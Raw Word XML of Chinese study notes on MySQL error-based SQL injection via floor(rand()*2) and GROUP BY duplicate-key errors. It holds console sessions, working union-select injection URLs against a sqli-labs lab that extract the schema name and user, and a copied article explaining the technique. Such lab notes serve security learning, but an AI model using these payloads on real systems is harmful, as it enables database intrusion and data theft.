        <w:t>|security1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|security1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|security0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|security1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|security0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|security1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|security1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|security1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|security1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|security0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|security0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+----------------------------------------------+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13rows in set (0.02 sec)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mysql&gt;select concat((select database()), floor(rand()*2)) from information_schema.SCHEMATA;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+----------------------------------------------+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|concat((select database()), floor(rand()*2))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+----------------------------------------------+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|security0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|security0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|security1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|security1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|security0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|security0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+----------------------------------------------+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6rows in set (0.02 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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接下来我们使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GROUP BY</w:t>
      </w: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函数完成查询，我们可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w: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或</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w: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获取结果，</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w: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表会返回</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>100</w:t>
      </w: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多条数据，可以用来分析随机数。</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>group by</w:t>
      </w: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可以用来去重。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE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6CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql&gt;select concat((select database()), floor(rand()*2)) as a from information_schema.columns group by a;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+-----------+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|a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+-----------+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|security0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|security1 |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+-----------+</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>2rows in set (0.11 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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注意</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE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006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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内嵌查询</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SELECT database()</w:t>
      </w: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可以被其他查询代替，这个查询将会伴随</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MYSQL</w:t>
      </w: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错误输出。例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE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006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6C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SELECT version(), user() </w:t>
      </w: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或获取完整的表，栏目等，就像第一部分讨论的那样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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接着上面的实例继续。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6CE">
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mysql&gt;select datadir();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6CE">
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ERROR1305 (42000): FUNCTION security.datadir does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6CE">
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mysql&gt;select count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6CE">
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ERROR1062 (23000): Duplicate entry 'security1' for key 'group_key'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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荣誉属于那些聪明的人，他们发现了聚合函数和</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GROUP BY</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:eastAsia="宋体" w:hAnsi="AR PL KaitiM GB" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的致命组合。重复的值，导致执行查询时，产生错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier 10 Pitch" w:eastAsia="宋体" w:hAnsi="Courier 10 Pitch" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE">
      <w:r w:rsidRPr="005006CE">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat(0x3a,0x3a,(select schema_name from information_schema.schemata limit 1,1),0x3a,0x3a, floor (rand()*2)) a from information_schema.tables group by a; -- k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE"/>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE"/>
    <w:p w:rsidR="005006CE" w:rsidRDefault="000A3639" w:rsidP="005006CE">
      <w:r w:rsidRPr="000A3639">
        <w:t>http://172.16.19.146:8080/sqli-labs-master/Less-6/?id=1" union select 1,2,3 from information_schema.tables ; -- k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3639" w:rsidRDefault="000A3639" w:rsidP="005006CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D77D3B7" wp14:editId="37C81B8C">
            <wp:extent cx="5274310" cy="1382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39" w:rsidRDefault="000A3639" w:rsidP="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>证明语句没问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70B1" w:rsidRDefault="00FA70B1" w:rsidP="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3639" w:rsidRDefault="00FA70B1" w:rsidP="005006CE">
      <w:r w:rsidRPr="00FA70B1">
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat_ws(0x23,0x23,(select user()),0x23,floor(rand()*2)) as a from  users group by  a </w:t>
      </w:r>
      <w:r w:rsidR="0090048B">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA70B1">
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0090048B" w:rsidRDefault="0090048B" w:rsidP="005006CE"/>
    <w:p w:rsidR="0090048B" w:rsidRDefault="0090048B" w:rsidP="005006CE">
      <w:r w:rsidRPr="0090048B">
        <w:t xml:space="preserve">http://172.16.19.146:8080/sqli-labs-master/Less-6/?id=1" union select 1,count(*),concat(0x23,0x23,(select schema_name from information_schema.schemata limit 0,1 ),0x23,floor(rand()*2)) as a from  users group by  a </w:t>
      </w:r>
      <w:r w:rsidR="008A4CCD">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0090048B">
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4CCD" w:rsidRDefault="008A4CCD" w:rsidP="005006CE"/>
    <w:p w:rsidR="008A4CCD" w:rsidRDefault="008A4CCD" w:rsidP="005006CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D93A3E8" wp14:editId="0F599F6E">
            <wp:extent cx="5274310" cy="1299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CD" w:rsidRDefault="008A4CCD" w:rsidP="005006CE"/>
    <w:p w:rsidR="008A4CCD" w:rsidRDefault="008A4CCD" w:rsidP="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他原理类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C4130" w:rsidRDefault="001C4130" w:rsidP="005006CE"/>
    <w:p w:rsidR="001C4130" w:rsidRDefault="001C4130" w:rsidP="005006CE"/>
    <w:p w:rsidR="001C4130" w:rsidRPr="001C4130" w:rsidRDefault="001C4130" w:rsidP="001C41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130">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性，即可能为0也可能为1（group by key的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，如果key存在于临时表中，则不在临时表中则更新临时表中的数据；如果该key不存在于临时表中，则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数，检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0，如果此时临时表只有key为1的行不存在key为0的行，那么数据库要将该条记录插入临时表，由于是随机数，插时又要计算一下随机值，此时floor(random(0)*2)结果可能为1，就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。具体原理参考：http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html）。”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="005006CE"/>
    <w:p w:rsidR="004652F3" w:rsidRPr="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"/>
    <w:p w:rsidR="004652F3" w:rsidRPr="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"/>
    <w:p w:rsidR="004652F3" w:rsidRPr="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"/>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"/>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3"/>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>经典的MySQL Duplicate entry报错注入</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:r>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="lijiejie" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>lijiejie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> on 2014 年 9 月 18 日 | 浏览 1,476 次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>SQL注射取数据的方式有多种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F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利用union select查询直接在页面上返回数据，这种最为常见，一个前提是攻击者能够构造闭合的查询。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F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Oracle中利用监听UTL_HTTP.request发起的HTTP请求，把QuerySet反弹回攻击者的主机。当然，HTTP服务器对URL的长度有一定限制，因此每次可返回的数据量不可过多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F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lastRenderedPageBreak/>
        <w:t> 基于错误消息取数据，前提是页面能够响应详细的错误描述。它的一个优点是，我们可能不必太费力去猜测和闭合SQL(可以构造子查询，让MySQL在子查询中报错)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F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盲注，页面不会显示错误消息。常见基于布尔的盲注、基于时间的盲注，此类注射点利用价值相对要低一点，猜解数据的时间较长。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>本篇简单说明非常经典的基于错误回显的MySQL注射。最重要的，就是理解下面的SQL查询：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>select count(*),floor(rand(0)*2)x from information_schema.character_sets group by x;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>上面的这条SQL将报错: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>Duplicate entry ‘1’ for key ‘group_key’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>如下图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7172325" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="图片 3" descr="mysql_error_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_error_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F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1. 为什么MySQL注射要用information_schema库？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>答案是这个库是MySQL自带的，安装之后就创建好了，所有账号都有权限访问。攻击者无需猜解库名、表名。跟Oracle注射使用dual类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>2. 如何利用报错取数据？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>利用报错，攻击者把目标数据concat连接到floor()函数的前后即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>例如，下面的语句用于获取MySQL Server版本，构造：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>mysql&gt; select count(*),concat( floor(rand(0)*2), 0x5e5e5e, version(), 0x5e5e5e) x from information_schema.character_sets</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>group by x;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>ERROR 1062 (23000): Duplicate entry ‘1^^^5.5.28^^^’ for key ‘group_key’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>通过报错，即可知道当前数据库是5.5.28。0x5e5e5e是3个尖括号的16进制表示。 自动化SQL注射工具通常会在目标数据前后做类似的标记，方便程序提取。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>加上标记，也可以方便攻击者在大的页面中搜索。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. 为何这条语句会报错?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>rand(0)是把0作为生成随机数的种子。首先明确一点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>无论查询多少次，无论在哪台MySQL Server上查询，连续rand(0)生成的序列是固定的</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3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82.25pt;height:66.75pt" o:ole="">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
          <w:control r:id="rId16" w:name="DefaultOcxName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6084"/>
      </w:tblGrid>
      <w:tr w:rsidR="004652F3" w:rsidTr="00465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2F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004652F3" w:rsidRDefault="004652F3" w:rsidP="004652F3">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-v"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="crayon-o"/>
              </w:rPr>
              <w:t>&gt;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>select rand</w:t>
            </w:r>
